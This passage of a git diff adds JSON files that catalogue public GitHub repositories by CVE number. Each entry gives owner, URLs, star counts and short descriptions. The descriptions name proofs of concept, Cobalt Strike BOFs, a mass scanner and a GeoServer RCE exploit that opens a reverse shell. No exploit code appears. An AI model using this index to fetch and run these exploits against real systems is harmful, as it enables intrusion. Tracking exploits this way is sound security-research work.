0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-35133.json b/2024/CVE-2024-35133.json new file mode 100644 index 0000000000..7a3f4a5b6e --- /dev/null +++ b/2024/CVE-2024-35133.json @@ -0,0 +1,33 @@ +[ + { + "id": 874697408, + "name": "Ozozuz-IBM-Security-Verify-CVE-2024-35133", + "full_name": "Ozozuz\/Ozozuz-IBM-Security-Verify-CVE-2024-35133", + "owner": { + "login": "Ozozuz", + "id": 32651700, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/32651700?v=4", + "html_url": "https:\/\/github.com\/Ozozuz", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Ozozuz\/Ozozuz-IBM-Security-Verify-CVE-2024-35133", + "description": "Security Bulletin for CVE-2024-35133 - With PoC", + "fork": false, + "created_at": "2024-10-18T09:49:27Z", + "updated_at": "2024-10-21T09:48:43Z", + "pushed_at": "2024-10-18T09:50:02Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-35176.json b/2024/CVE-2024-35176.json new file mode 100644 index 0000000000..433172059c --- /dev/null +++ b/2024/CVE-2024-35176.json @@ -0,0 +1,33 @@ +[ + { + "id": 905906674, + "name": "CVE-2024-35176", + "full_name": "SpiralBL0CK\/CVE-2024-35176", + "owner": { + "login": "SpiralBL0CK", + "id": 25670930, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/25670930?v=4", + "html_url": "https:\/\/github.com\/SpiralBL0CK", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/SpiralBL0CK\/CVE-2024-35176", + "description": "CVE-2024-35176 poc full", + "fork": false, + "created_at": "2024-12-19T19:01:53Z", + "updated_at": "2025-01-07T09:58:18Z", + "pushed_at": "2024-12-19T22:16:06Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-35205.json b/2024/CVE-2024-35205.json new file mode 100644 index 0000000000..d4311f808b --- /dev/null +++ b/2024/CVE-2024-35205.json @@ -0,0 +1,33 @@ +[ + { + "id": 816188632, + "name": "Dirty_Stream-Android-POC", + "full_name": "cyb3r-w0lf\/Dirty_Stream-Android-POC", + "owner": { + "login": "cyb3r-w0lf", + "id": 63139650, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/63139650?v=4", + "html_url": "https:\/\/github.com\/cyb3r-w0lf", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/cyb3r-w0lf\/Dirty_Stream-Android-POC", + "description": "Dirty Stream exploit for MI-File Explorer V1-210567 version. CVE-2024-35205", + "fork": false, + "created_at": "2024-06-17T08:10:47Z", + "updated_at": "2024-10-23T00:23:30Z", + "pushed_at": "2024-09-30T09:06:14Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-35242.json b/2024/CVE-2024-35242.json new file mode 100644 index 0000000000..70959de644 --- /dev/null +++ b/2024/CVE-2024-35242.json @@ -0,0 +1,33 @@ +[ + { + "id": 829004547, + "name": "CVE-2024-35242", + "full_name": "KKkai0315\/CVE-2024-35242", + "owner": { + "login": "KKkai0315", + "id": 113790723, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/113790723?v=4", + "html_url": "https:\/\/github.com\/KKkai0315", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/KKkai0315\/CVE-2024-35242", + "description": "A test repository for the vulnerability CVE-2024-35242's PoC", + "fork": false, + "created_at": "2024-07-15T15:01:31Z", + "updated_at": "2024-07-15T15:02:09Z", + "pushed_at": "2024-07-16T03:39:30Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-35250.json b/2024/CVE-2024-35250.json new file mode 100644 index 0000000000..bed0dcf727 --- /dev/null +++ b/2024/CVE-2024-35250.json @@ -0,0 +1,99 @@ +[ + { + "id": 872102343, + "name": "CVE-2024-35250", + "full_name": "varwara\/CVE-2024-35250", + "owner": { + "login": "varwara", + "id": 167913816, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/167913816?v=4", + "html_url": "https:\/\/github.com\/varwara", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/varwara\/CVE-2024-35250", + "description": "PoC for the Untrusted Pointer Dereference in the ks.sys driver", + "fork": false, + "created_at": "2024-10-13T19:30:20Z", + "updated_at": "2025-01-06T16:52:03Z", + "pushed_at": "2024-11-29T16:56:23Z", + "stargazers_count": 254, + "watchers_count": 254, + "has_discussions": false, + "forks_count": 56, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 56, + "watchers": 254, + "score": 0, + "subscribers_count": 7 + }, + { + "id": 878394797, + "name": "CVE-2024-35250-BOF", + "full_name": "ro0tmylove\/CVE-2024-35250-BOF", + "owner": { + "login": "ro0tmylove", + "id": 87022727, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/87022727?v=4", + "html_url": "https:\/\/github.com\/ro0tmylove", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ro0tmylove\/CVE-2024-35250-BOF", + "description": "Cobalt Strike 的 CVE-2024-35250 的 BOF。(请给我加个星,谢谢。) ", + "fork": false, + "created_at": "2024-10-25T10:06:09Z", + "updated_at": "2024-12-17T10:07:43Z", + "pushed_at": "2024-10-21T04:15:27Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 6, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 893053192, + "name": "CVE-2024-35250-BOF", + "full_name": "yinsel\/CVE-2024-35250-BOF", + "owner": { + "login": "yinsel", + "id": 91541985, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/91541985?v=4", + "html_url": "https:\/\/github.com\/yinsel", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/yinsel\/CVE-2024-35250-BOF", + "description": "CVE-2024-35250 的 Beacon Object File (BOF) 实现。", + "fork": false, + "created_at": "2024-11-23T12:12:00Z", + "updated_at": "2024-12-17T10:07:52Z", + "pushed_at": "2024-11-28T09:23:35Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cobalt-strike", + "cve-2024-35250", + "cve-2024-35250-bof" + ], + "visibility": "public", + "forks": 0, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-35286.json b/2024/CVE-2024-35286.json new file mode 100644 index 0000000000..4882cfc745 --- /dev/null +++ b/2024/CVE-2024-35286.json @@ -0,0 +1,33 @@ +[ + { + "id": 899750477, + "name": "CVE-2024-35286_scan.nse", + "full_name": "lu4m575\/CVE-2024-35286_scan.nse", + "owner": { + "login": "lu4m575", + "id": 29789496, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/29789496?v=4", + "html_url": "https:\/\/github.com\/lu4m575", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/lu4m575\/CVE-2024-35286_scan.nse", + "description": null, + "fork": false, + "created_at": "2024-12-06T23:44:44Z", + "updated_at": "2024-12-06T23:44:44Z", + "pushed_at": "2024-12-06T23:44:44Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-35315.json b/2024/CVE-2024-35315.json new file mode 100644 index 0000000000..f4b98e2071 --- /dev/null +++ b/2024/CVE-2024-35315.json @@ -0,0 +1,33 @@ +[ + { + "id": 809831418, + "name": "CVE-2024-35315-POC", + "full_name": "ewilded\/CVE-2024-35315-POC", + "owner": { + "login": "ewilded", + "id": 1158719, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1158719?v=4", + "html_url": "https:\/\/github.com\/ewilded", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ewilded\/CVE-2024-35315-POC", + "description": "Mitel Collab Local Privilege Escalation CVE-2024-35315 PoC", + "fork": false, + "created_at": "2024-06-03T14:29:35Z", + "updated_at": "2024-12-11T05:01:12Z", + "pushed_at": "2024-06-03T14:31:35Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-35333.json b/2024/CVE-2024-35333.json new file mode 100644 index 0000000000..2415d2a085 --- /dev/null +++ b/2024/CVE-2024-35333.json @@ -0,0 +1,33 @@ +[ + { + "id": 800500812, + "name": "CVE-2024-35333", + "full_name": "momo1239\/CVE-2024-35333", + "owner": { + "login": "momo1239", + "id": 34490185, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/34490185?v=4", + "html_url": "https:\/\/github.com\/momo1239", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/momo1239\/CVE-2024-35333", + "description": null, + "fork": false, + "created_at": "2024-05-14T13:02:36Z", + "updated_at": "2024-05-28T17:36:58Z", + "pushed_at": "2024-05-28T17:36:01Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-35468.json b/2024/CVE-2024-35468.json new file mode 100644 index 0000000000..d05820b195 --- /dev/null +++ b/2024/CVE-2024-35468.json @@ -0,0 +1,33 @@ +[ + { + "id": 799070356, + "name": "CVE-2024-35468", + "full_name": "dovankha\/CVE-2024-35468", + "owner": { + "login": "dovankha", + "id": 63991630, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/63991630?v=4", + "html_url": "https:\/\/github.com\/dovankha", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/dovankha\/CVE-2024-35468", + "description": "CVE-2024-35468 | SQL injection", + "fork": false, + "created_at": "2024-05-11T05:23:41Z", + "updated_at": "2024-05-30T04:14:44Z", + "pushed_at": "2024-05-30T03:55:11Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-35469.json b/2024/CVE-2024-35469.json new file mode 100644 index 0000000000..cf9a305c77 --- /dev/null +++ b/2024/CVE-2024-35469.json @@ -0,0 +1,33 @@ +[ + { + "id": 799102410, + "name": "CVE-2024-35469", + "full_name": "dovankha\/CVE-2024-35469", + "owner": { + "login": "dovankha", + "id": 63991630, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/63991630?v=4", + "html_url": "https:\/\/github.com\/dovankha", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/dovankha\/CVE-2024-35469", + "description": "CVE-2024-35469 | SQL injection", + "fork": false, + "created_at": "2024-05-11T07:27:31Z", + "updated_at": "2024-05-31T02:59:54Z", + "pushed_at": "2024-05-30T03:59:15Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-35475.json b/2024/CVE-2024-35475.json new file mode 100644 index 0000000000..f01374d9b8 --- /dev/null +++ b/2024/CVE-2024-35475.json @@ -0,0 +1,33 @@ +[ + { + "id": 804405352, + "name": "CVE-2024-35475", + "full_name": "carsonchan12345\/CVE-2024-35475", + "owner": { + "login": "carsonchan12345", + "id": 44266907, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/44266907?v=4", + "html_url": "https:\/\/github.com\/carsonchan12345", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/carsonchan12345\/CVE-2024-35475", + "description": null, + "fork": false, + "created_at": "2024-05-22T14:21:48Z", + "updated_at": "2024-05-22T14:23:45Z", + "pushed_at": "2024-05-22T14:23:41Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-35511.json b/2024/CVE-2024-35511.json new file mode 100644 index 0000000000..d9f48921da --- /dev/null +++ b/2024/CVE-2024-35511.json @@ -0,0 +1,33 @@ +[ + { + "id": 805787755, + "name": "CVE-2024-35511", + "full_name": "efekaanakkar\/CVE-2024-35511", + "owner": { + "login": "efekaanakkar", + "id": 130908672, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/130908672?v=4", + "html_url": "https:\/\/github.com\/efekaanakkar", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/efekaanakkar\/CVE-2024-35511", + "description": "Men Salon Management System Using PHP and MySQL", + "fork": false, + "created_at": "2024-05-25T13:07:35Z", + "updated_at": "2024-05-25T22:53:35Z", + "pushed_at": "2024-05-25T22:44:37Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-3552.json b/2024/CVE-2024-3552.json new file mode 100644 index 0000000000..fe8df3326b --- /dev/null +++ b/2024/CVE-2024-3552.json @@ -0,0 +1,33 @@ +[ + { + "id": 806641901, + "name": "CVE-2024-3552-Poc", + "full_name": "truonghuuphuc\/CVE-2024-3552-Poc", + "owner": { + "login": "truonghuuphuc", + "id": 20487674, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/20487674?v=4", + "html_url": "https:\/\/github.com\/truonghuuphuc", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/truonghuuphuc\/CVE-2024-3552-Poc", + "description": "CVE-2024-3552 Web Directory Free <= 1.6.9 - Unauthenticated SQL Injection", + "fork": false, + "created_at": "2024-05-27T15:36:24Z", + "updated_at": "2024-06-26T12:03:23Z", + "pushed_at": "2024-05-28T10:25:55Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-35538.json b/2024/CVE-2024-35538.json new file mode 100644 index 0000000000..31df07eb7a --- /dev/null +++ b/2024/CVE-2024-35538.json @@ -0,0 +1,33 @@ +[ + { + "id": 844197058, + "name": "Typecho-Multiple-Vulnerabilities", + "full_name": "cyberaz0r\/Typecho-Multiple-Vulnerabilities", + "owner": { + "login": "cyberaz0r", + "id": 35109470, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/35109470?v=4", + "html_url": "https:\/\/github.com\/cyberaz0r", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/cyberaz0r\/Typecho-Multiple-Vulnerabilities", + "description": "Exploits for Typecho CVE-2024-35538, CVE-2024-35539 and CVE-2024-35540", + "fork": false, + "created_at": "2024-08-18T17:09:05Z", + "updated_at": "2024-08-20T01:34:44Z", + "pushed_at": "2024-08-18T19:37:13Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-35584.json b/2024/CVE-2024-35584.json new file mode 100644 index 0000000000..58bc90b390 --- /dev/null +++ b/2024/CVE-2024-35584.json @@ -0,0 +1,33 @@ +[ + { + "id": 872579006, + "name": "CVE-2024-35584", + "full_name": "whwhwh96\/CVE-2024-35584", + "owner": { + "login": "whwhwh96", + "id": 42708408, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/42708408?v=4", + "html_url": "https:\/\/github.com\/whwhwh96", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/whwhwh96\/CVE-2024-35584", + "description": "OpenSIS SQLi Injection", + "fork": false, + "created_at": "2024-10-14T17:24:01Z", + "updated_at": "2024-10-28T19:27:47Z", + "pushed_at": "2024-10-14T17:42:11Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-3596.json b/2024/CVE-2024-3596.json new file mode 100644 index 0000000000..9057fbfaf3 --- /dev/null +++ b/2024/CVE-2024-3596.json @@ -0,0 +1,33 @@ +[ + { + "id": 826482682, + "name": "CVE-2024-3596-Detector", + "full_name": "alperenugurlu\/CVE-2024-3596-Detector", + "owner": { + "login": "alperenugurlu", + "id": 64872731, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/64872731?v=4", + "html_url": "https:\/\/github.com\/alperenugurlu", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/alperenugurlu\/CVE-2024-3596-Detector", + "description": null, + "fork": false, + "created_at": "2024-07-09T19:44:40Z", + "updated_at": "2024-11-04T12:09:42Z", + "pushed_at": "2024-07-09T20:21:22Z", + "stargazers_count": 7, + "watchers_count": 7, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 7, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-36079.json b/2024/CVE-2024-36079.json new file mode 100644 index 0000000000..e9387b9565 --- /dev/null +++ b/2024/CVE-2024-36079.json @@ -0,0 +1,33 @@ +[ + { + "id": 803520695, + "name": "vaultize_CVE-2024-36079", + "full_name": "DxRvs\/vaultize_CVE-2024-36079", + "owner": { + "login": "DxRvs", + "id": 65038265, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/65038265?v=4", + "html_url": "https:\/\/github.com\/DxRvs", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/DxRvs\/vaultize_CVE-2024-36079", + "description": null, + "fork": false, + "created_at": "2024-05-20T22:07:41Z", + "updated_at": "2024-05-24T17:11:40Z", + "pushed_at": "2024-05-24T17:11:37Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-36104.json b/2024/CVE-2024-36104.json new file mode 100644 index 0000000000..324a3892a6 --- /dev/null +++ b/2024/CVE-2024-36104.json @@ -0,0 +1,33 @@ +[ + { + "id": 816184138, + "name": "CVE-2024-36104", + "full_name": "ggfzx\/CVE-2024-36104", + "owner": { + "login": "ggfzx", + "id": 86279656, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/86279656?v=4", + "html_url": "https:\/\/github.com\/ggfzx", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ggfzx\/CVE-2024-36104", + "description": null, + "fork": false, + "created_at": "2024-06-17T07:57:58Z", + "updated_at": "2024-06-18T05:59:22Z", + "pushed_at": "2024-06-17T08:01:57Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-36401.json b/2024/CVE-2024-36401.json new file mode 100644 index 0000000000..ca1689830d --- /dev/null +++ b/2024/CVE-2024-36401.json @@ -0,0 +1,505 @@ +[ + { + "id": 824152890, + "name": "CVE-2024-36401", + "full_name": "bigb0x\/CVE-2024-36401", + "owner": { + "login": "bigb0x", + "id": 13532434, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/13532434?v=4", + "html_url": "https:\/\/github.com\/bigb0x", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/bigb0x\/CVE-2024-36401", + "description": "POC for CVE-2024-36401. This POC will attempt to establish a reverse shell from the vlun targets.", + "fork": false, + "created_at": "2024-07-04T13:19:47Z", + "updated_at": "2024-12-06T09:40:42Z", + "pushed_at": "2024-07-04T19:18:04Z", + "stargazers_count": 32, + "watchers_count": 32, + "has_discussions": false, + "forks_count": 18, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 18, + "watchers": 32, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 824386148, + "name": "CVE-2024-36401", + "full_name": "Niuwoo\/CVE-2024-36401", + "owner": { + "login": "Niuwoo", + "id": 57100441, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/57100441?v=4", + "html_url": "https:\/\/github.com\/Niuwoo", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Niuwoo\/CVE-2024-36401", + "description": "POC", + "fork": false, + "created_at": "2024-07-05T03:02:30Z", + "updated_at": "2024-11-20T16:30:53Z", + "pushed_at": "2024-07-05T03:05:39Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 824643210, + "name": "CVE-2024-36401", + "full_name": "RevoltSecurities\/CVE-2024-36401", + "owner": { + "login": "RevoltSecurities", + "id": 119435129, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/119435129?v=4", + "html_url": "https:\/\/github.com\/RevoltSecurities", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/RevoltSecurities\/CVE-2024-36401", + "description": "Exploiter a Vulnerability detection and Exploitation tool for GeoServer Unauthenticated Remote Code Execution CVE-2024-36401.", + "fork": false, + "created_at": "2024-07-05T15:24:50Z", + "updated_at": "2024-07-20T21:01:18Z", + "pushed_at": "2024-07-05T15:33:09Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 824794128, + "name": "CVE-2024-36401", + "full_name": "Mr-xn\/CVE-2024-36401", + "owner": { + "login": "Mr-xn", + "id": 18260135, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/18260135?v=4", + "html_url": "https:\/\/github.com\/Mr-xn", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Mr-xn\/CVE-2024-36401", + "description": "Remote Code Execution (RCE) Vulnerability In Evaluating Property Name Expressions with multies ways to exploit", + "fork": false, + "created_at": "2024-07-06T01:10:28Z", + "updated_at": "2024-12-18T15:53:25Z", + "pushed_at": "2024-07-06T01:57:58Z", + "stargazers_count": 44, + "watchers_count": 44, + "has_discussions": false, + "forks_count": 6, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve", + "cve-2024-36401", + "geoserver", + "poc", + "rce", + "vulnerabilities" + ], + "visibility": "public", + "forks": 6, + "watchers": 44, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 827686717, + "name": "CVE-2024-36401-GeoServer-RCE", + "full_name": "jakabakos\/CVE-2024-36401-GeoServer-RCE", + "owner": { + "login": "jakabakos", + "id": 42498816, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/42498816?v=4", + "html_url": "https:\/\/github.com\/jakabakos", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/jakabakos\/CVE-2024-36401-GeoServer-RCE", + "description": null, + "fork": false, + "created_at": "2024-07-12T07:01:12Z", + "updated_at": "2024-07-12T07:07:18Z", + "pushed_at": "2024-07-12T07:07:14Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 829775784, + "name": "geoserver-", + "full_name": "ahisec\/geoserver-", + "owner": { + "login": "ahisec", + "id": 3255339, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/3255339?v=4", + "html_url": "https:\/\/github.com\/ahisec", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ahisec\/geoserver-", + "description": "geoserver CVE-2024-36401漏洞利用工具", + "fork": false, + "created_at": "2024-07-17T02:25:21Z", + "updated_at": "2024-12-13T01:40:18Z", + "pushed_at": "2024-07-24T15:33:03Z", + "stargazers_count": 16, + "watchers_count": 16, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 16, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 835900082, + "name": "CVE-2024-36401", + "full_name": "Chocapikk\/CVE-2024-36401", + "owner": { + "login": "Chocapikk", + "id": 88535377, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/88535377?v=4", + "html_url": "https:\/\/github.com\/Chocapikk", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Chocapikk\/CVE-2024-36401", + "description": "GeoServer Remote Code Execution", + "fork": false, + "created_at": "2024-07-30T18:43:40Z", + "updated_at": "2024-12-26T04:35:42Z", + "pushed_at": "2024-08-02T14:57:26Z", + "stargazers_count": 77, + "watchers_count": 77, + "has_discussions": false, + "forks_count": 12, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 12, + "watchers": 77, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 836929821, + "name": "CVE-2024-36401-PoC", + "full_name": "yisas93\/CVE-2024-36401-PoC", + "owner": { + "login": "yisas93", + "id": 115517295, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/115517295?v=4", + "html_url": "https:\/\/github.com\/yisas93", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/yisas93\/CVE-2024-36401-PoC", + "description": null, + "fork": false, + "created_at": "2024-08-01T21:22:51Z", + "updated_at": "2024-08-01T21:30:07Z", + "pushed_at": "2024-08-01T21:30:04Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 848340676, + "name": "geoexplorer", + "full_name": "justin-p\/geoexplorer", + "owner": { + "login": "justin-p", + "id": 8249280, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/8249280?v=4", + "html_url": "https:\/\/github.com\/justin-p", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/justin-p\/geoexplorer", + "description": "Mass scanner for CVE-2024-36401", + "fork": false, + "created_at": "2024-08-27T15:28:04Z", + "updated_at": "2024-10-23T10:07:20Z", + "pushed_at": "2024-08-27T16:16:15Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 856852823, + "name": "CVE-2024-36401-PoC", + "full_name": "daniellowrie\/CVE-2024-36401-PoC", + "owner": { + "login": "daniellowrie", + "id": 19762230, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/19762230?v=4", + "html_url": "https:\/\/github.com\/daniellowrie", + "user_view_type": "public" + }, + "html_url": 